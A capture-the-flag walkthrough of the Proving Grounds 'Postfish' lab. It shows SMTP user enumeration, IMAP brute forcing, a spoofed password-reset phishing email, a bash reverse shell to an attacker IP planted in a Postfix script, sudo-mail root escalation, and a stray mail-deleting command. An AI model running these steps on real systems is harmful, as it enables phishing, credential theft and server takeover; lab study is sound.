Postfish
Exploitation guide for Postfish | Proving Grounds
Last updated
Was this helpful?
Exploitation guide for Postfish | Proving Grounds
Last updated
Was this helpful?
We will get the initial foothold by spear-phising which will give us credential to ssh. Then we will exploit insecure functionality & sudo misconfiguration to gain the root privilege.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/postfish/scans]
└─$ sudo nmap $ip -sVCS -O -oN nmapInitial.txt -Pn
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA)
| 256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA)
|_ 256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: postfish.off, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING,
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2021-01-26T10:26:37
|_Not valid after: 2031-01-24T10:26:37
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: UIDL RESP-CODES SASL(PLAIN) AUTH-RESP-CODE STLS PIPELINING CAPA TOP USER
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2021-01-26T10:26:37
|_Not valid after: 2031-01-24T10:26:37
143/tcp open imap Dovecot imapd (Ubuntu)
|_imap-capabilities: capabilities ENABLE STARTTLS IDLE more post-login ID have listed Pre-login LOGIN-REFERRALS LITERAL+ AUTH=PLAINA0001 OK IMAP4rev1 SASL-IR
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2021-01-26T10:26:37
|_Not valid after: 2031-01-24T10:26:37
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
|_imap-capabilities: capabilities ENABLE Pre-login IDLE post-login ID more listed have LOGIN-REFERRALS LITERAL+ AUTH=PLAINA0001 OK IMAP4rev1 SASL-IR
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2021-01-26T10:26:37
|_Not valid after: 2031-01-24T10:26:37
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE UIDL TOP PIPELINING RESP-CODES CAPA USER SASL(PLAIN)
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2021-01-26T10:26:37
|_Not valid after: 2031-01-24T10:26:37
We need to change our /etc/hosts to access this site. Add following line to your /etc/hosts
192.168.69.137 postfish.offWeb doesn't have that much functionality which we can leverage to gain RCE. But the team section has listed 4 employees and their department. So we will keep note of this information for now.
Claire madison - hr
mike ross - it
brian moore - sales
sarah lorem - legalFirst we will enumerate the departments. And see if all of them are available.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/postfish/loot]
└─$ smtp-user-enum -M VRFY -U "department.txt" -t $ip -p 25
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... department.txt
Target count ............. 1
Username count ........... 5
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............
######## Scan started at Fri Aug 27 10:43:46 2021 #########
192.168.69.137: sales exists
192.168.69.137: hr exists
192.168.69.137: legal exists
192.168.69.137: it exists
######## Scan completed at Fri Aug 27 10:43:47 2021 #########
4 results.
5 queries in 1 seconds (5.0 queries / sec)
Ok great. All of them Exist. Now lets enumerate the user of those department. We will generate a wordlist with general naming convention which company follows using this great tool.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/postfish/loot]
└─$ ~/oscp/tools/usernamer.py -f employeeusername.txt -l > smtp_usernames.txt
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/postfish/loot]
└─$ wc smtp_usernames.txt
395 395 2842 smtp_usernames.txt
Now that we have wordlist of usernames. Lets enumerate the smtp again.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/postfish/loot]
└─$ smtp-user-enum -M VRFY -U "../loot/smtp_usernames.txt" -t $ip -p 25
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... ../loot/smtp_usernames.txt
Target count ............. 1
Username count ........... 395
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............
######## Scan started at Fri Aug 27 08:44:32 2021 #########
192.168.69.137: claire.madison exists
192.168.69.137: mike.ross exists
192.168.69.137: brian.moore exists
192.168.69.137: sarah.lorem exists
######## Scan completed at Fri Aug 27 08:45:50 2021 #########
4 results.
395 queries in 78 seconds (5.1 queries / sec)
Now we have. Bunch of valid usernames and departments as well as email.
# User-email
claire.madison@postfish.off
mike.ross@postfish.off
brian.moore@postfish.off
sarah.lore@postfish.off
# department - email
it@postfish.off
sales@postfish.off
legal@postfish.off
hr@postfish.offBut all of these information are useless right now. Since we don't have access to send/check mail yet.
So we will Bruteforce imap with hydra. We will use the following wordlist for username and for password we will generate the wordlist with the help of cewl
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/postfish/loot]
└─$ cat knownusernames.txt
hr
mail
root
sales
it
legal
claire.madison
mike.ross
brian.moore
sarah.lorem┌──(imtodess㉿deathnote)-[~/…/boxes/pg/postfish/scans]
└─$ cewl -d 5 -m 3 http://postfish.off/team.html -w ../loot/password.txt
CeWL 5.5.2 (Grouping) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/postfish/loot]
└─$ wc password.txt
116 116 776 password.txt
Bruteforce with Hydra after some time we will get valid credential.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/postfish/loot]
└─$ hydra -L ./knownusernames.txt -P ./password.txt -f $ip imap -V -I
. . .
[143][imap] host: 192.168.69.137 login: sales password: sales
. . .Note: Instead of bruteforcing first which often takes lots of time. Try common passwords manually to save yourself some time.
Since we now have valid credential. We will try to check mails.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/postfish/loot]
└─$ nc -nv $ip 110 1 ⨯
(UNKNOWN) [192.168.69.137] 110 (pop3) open
+OK Dovecot (Ubuntu) ready.
user sales
+OK
pass sales
+OK Logged in.
list
+OK 1 messages:
1 683
.
retr 1
+OK 683 octets
Return-Path: <it@postfish.off>
X-Original-To: sales@postfish.off
Delivered-To: sales@postfish.off
Received: by postfish.off (Postfix, from userid 997)
id B277B45445; Wed, 31 Mar 2021 13:14:34 +0000 (UTC)
Received: from x (localhost [127.0.0.1])
by postfish.off (Postfix) with SMTP id 7712145434
for <sales@postfish.off>; Wed, 31 Mar 2021 13:11:23 +0000 (UTC)
Subject: ERP Registration Reminder
Message-Id: <20210331131139.7712145434@postfish.off>
Date: Wed, 31 Mar 2021 13:11:23 +0000 (UTC)
From: it@postfish.off
Hi Sales team,
We will be sending out password reset links in the upcoming week so that we can get you registered on the ERP system.
Regards,
IT
. There is one mail sent to sales department. They are supposed to get a link to reset there password. To exploit this , we will start a netcat listener and send them mail which contains our ip.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/postfish/loot]
└─$ nc -v postfish.off 25
postfish.off [192.168.69.137] 25 (smtp) open
220 postfish.off ESMTP Postfix (Ubuntu)
mail from: it@postfish.off
250 2.1.0 Ok
rcpt to: sales@postfish.off
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
hi claire,
Password reset link: http://192.168.49.69
regards,
.
250 2.0.0 Ok: queued as 26C744543F
quit
221 2.0.0 Bye We get nothing in response when we send it to sales so we will instead send it to brian.moore of sales department.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/postfish/loot]
└─$ nc -v postfish.off 25 1 ⨯
postfish.off [192.168.69.137] 25 (smtp) open
220 postfish.off ESMTP Postfix (Ubuntu)
mail from: it@postfish.off
250 2.1.0 Ok
rcpt to: brian.moore@postfish.off,claire.madison@postfish.off,mike.ross@postfish.off,sarah.lorem@postfish.off
501 5.1.3 Bad recipient address syntax
rcpt to: brian.moore@postfish.off
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
subject: Reset password
Hi Brian,
http://192.168.49.69
regards,
.
250 2.0.0 Ok: queued as 421EF4543F
quit
221 2.0.0 Bye After some time we will get a http request with brain.moore credential.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/postfish/loot]
└─$ nc -nvlp 80
listening on [any] 80 ...
connect to [192.168.49.69] from (UNKNOWN) [192.168.69.137] 45160
POST / HTTP/1.1
Host: 192.168.49.69
User-Agent: curl/7.68.0
Accept: */*
Content-Length: 207
Content-Type: application/x-www-form-urlencoded
first_name%3DBrian%26last_name%3DMoore%26email%3Dbrian.moore%postfish.off%26username%3Dbrian.moore%26password%3DEternaLSunshinE%26confifind /var/mail/ -type f ! -name
sales -delete_password%3DEternaLSunshinE Now login to ssh with credential brian.moore:EternaLSunshinE and get the flag.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/postfish/loot]
└─$ ssh brian.moore@192.168.69.137 130 ⨯
brian.moore@192.168.69.137's password:
brian.moore@postfish:~$ cat local.txt
7548d8c<REDACTED>730f3
From the result of linpeas we find that there is one file which is owned by root but we have permission to write in it.
╔══════════╣ Readable files belonging to root and readable by me but not world readable
-rwxrwx--- 1 root filter 1184 Aug 27 13:57 /etc/postfix/disclaimer
Check the content of the file.
brian.moore@postfish:~$ cat /etc/postfix/disclaimer
#!/bin/bash
# Localize these.
INSPECT_DIR=/var/spool/filter
SENDMAIL=/usr/sbin/sendmail
####### Changed From Original Script #######
DISCLAIMER_ADDRESSES=/etc/postfix/disclaimer_addresses
####### Changed From Original Script END #######
# Exit codes from <sysexits.h>
EX_TEMPFAIL=75
EX_UNAVAILABLE=69
. . .
It's a bash script. Since we can write in it we will put a bash reverse shell at the top.
brian.moore@postfish:~$ cat /etc/postfix/disclaimer
#!/bin/bash
# Localize these.
# change ip and port according to your need.
bash -i >& /dev/tcp/192.168.49.69/4444 0>&1
INSPECT_DIR=/var/spool/filter
SENDMAIL=/usr/sbin/sendmail
####### Changed From Original Script #######
DISCLAIMER_ADDRESSES=/etc/postfix/disclaimer_addresses
####### Changed From Original Script END #######
# Exit codes from <sysexits.h>
EX_TEMPFAIL=75
EX_UNAVAILABLE=69
. . .We were able to but our reverse shell payload but we still need to figure out how is this script being executed. Check below article which will give us info about the script.
tldr; Basically its a script which will get executed when receiving or sending mail.
So we will again send mail to brain.moore . Start a netcat listener and send mail to trigger the script.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/postfish/loot]
└─$ nc -v postfish.off 25
postfish.off [192.168.69.137] 25 (smtp) open
220 postfish.off ESMTP Postfix (Ubuntu)
mail from: it@postfish.off
250 2.1.0 Ok
rcpt to: brain.moore@postfish.off
550 5.1.1 <brain.moore@postfish.off>: Recipient address rejected: User unknown in local recipient table
rcpt to: brian.moore@postfish.off
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
Testing mail.
Regards,
that one annoying IT guy.
.
250 2.0.0 Ok: queued as 2FF424543F
421 4.4.2 postfish.off Error: timeout exceeded
We will get the shell as filter
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/postfish/loot]
└─$ nc -nvlp 4444 1 ⨯
listening on [any] 443 ...
connect to [192.168.49.69] from (UNKNOWN) [192.168.69.137] 56806
bash: cannot set terminal process group (35392): Inappropriate ioctl for device
bash: no job control in this shell
filter@postfish:/var/spool/postfix$ id
id
uid=997(filter) gid=997(filter) groups=997(filter)
filter@postfish:/var/spool/postfix$ whoami
whoami
filter Check sudo privilege
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/postfish/loot]
└─$ nc -nvlp 443 1 ⨯
listening on [any] 443 ...
connect to [192.168.49.69] from (UNKNOWN) [192.168.69.137] 56806
bash: cannot set terminal process group (35392): Inappropriate ioctl for device
bash: no job control in this shell
filter@postfish:/var/spool/postfix$ id
id
uid=997(filter) gid=997(filter) groups=997(filter)
filter@postfish:/var/spool/postfix$ whoami
whoami
filter
filter@postfish:/var/spool/postfix$ sudo -l
sudo -l
Matching Defaults entries for filter on postfish:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User filter may run the following commands on postfish:
(ALL) NOPASSWD: /usr/bin/mail * We can run mail as sudo without any password.
Just run sudo mail --exec='!/bin/bash' to escalate privilege to root.
filter@postfish:/var/spool/postfix$ sudo mail --exec='!/bin/bash'
sudo mail --exec='!/bin/bash'
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
# Upgrade shell to interactive
which python3
/usr/bin/python3
python3 -c 'import pty;pty.spawn("/bin/bash")'
root@postfish:/var/spool/postfix# cd /root
cd /root
root@postfish:~# ls
ls
disclaimer disclaimer.sh mail.sh proof.txt snap
root@postfish:~# cat proof
cat proof.txt
97c543<REDACTED>40ae9071
